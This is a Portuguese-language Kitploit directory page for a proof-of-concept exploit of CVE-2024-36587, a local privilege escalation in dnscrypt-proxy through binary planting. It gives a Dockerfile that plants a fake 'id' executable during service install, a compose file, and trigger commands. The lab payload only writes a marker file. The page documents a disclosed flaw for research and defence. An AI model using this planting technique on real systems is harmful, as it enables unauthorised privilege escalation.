Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-36587 — Exploit de prova de conceito para CVE-2024-36587 demonstrando escalonamento de privilégio local no dnscrypt-proxy via plantio binário, com ambiente de reprodução baseado em Docker. | Kitploit
Ferramentas/GitHubGitHub/meeeeing/cve-2024-36587
Escalada de PrivilégiosSegurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoExploração de Binários
GitHubmeeeeing/cve-2024-36587

CVE-2024-36587

Exploit de prova de conceito para CVE-2024-36587 demonstrando escalonamento de privilégio local no dnscrypt-proxy via plantio binário, com ambiente de reprodução baseado em Docker.

Ver Repositório
4há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-36587 - Escalação de Privilégio Local no dnscrypt-proxy

Visão Geral

  • Descrição da vulnerabilidade: Devido ao problema de confiar e registrar o arquivo executável no diretório atual durante a instalação do serviço dnscrypt-proxy, é possível inserir um binário malicioso e elevar privilégios.
  • Versão vulnerável: dnscrypt-proxy v2.0.0-alpha9 ~ v2.1.5
  • Método PoC: Plantio de binário (binary planting)

Configuração do Ambiente

root@kitploit:~
docker compose up --build

Após a construção e execução, o contêiner é criado.

Acessar o interior do contêiner:

root@kitploit:~
docker run -it --privileged dnscrypt-poc-poc bash

Gatilho da Vulnerabilidade

Dentro do contêiner:

root@kitploit:~
/tmp/id
cat /tmp/poc_was_here

Se Pwned_from_Docker for exibido, o PoC foi bem-sucedido.

Arquivos de Configuração

Dockerfile

root@kitploit:~
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y \
    git \
    golang-go \
    sudo

WORKDIR /workspace

RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
    cd dnscrypt-proxy && \
    git checkout tags/2.1.0 && \
    go build -o proxy ./dnscrypt-proxy

RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
    chmod +x /tmp/id && \
    ln -sf /tmp/id /usr/local/bin/id

CMD ["./dnscrypt-proxy/proxy", "-service", "install"]

docker-compose.yaml

root@kitploit:~
version: "3.8"

services:
  poc:
    build: .
    container_name: dnscrypt-poc
    privileged: true
    tty: true

Referências

  • https://github.com/DNSCrypt/dnscrypt-proxy
  • https://nvd.nist.gov/vuln/detail/CVE-2024-36587

Captura de Tela do Resultado do Laboratório

docker build success

Relatório Detalhado

Para uma análise mais detalhada e resultados do laboratório, consulte o seguinte documento PDF:

PoC_Report_CVE-2024-36587.pdf

Baixar ferramenta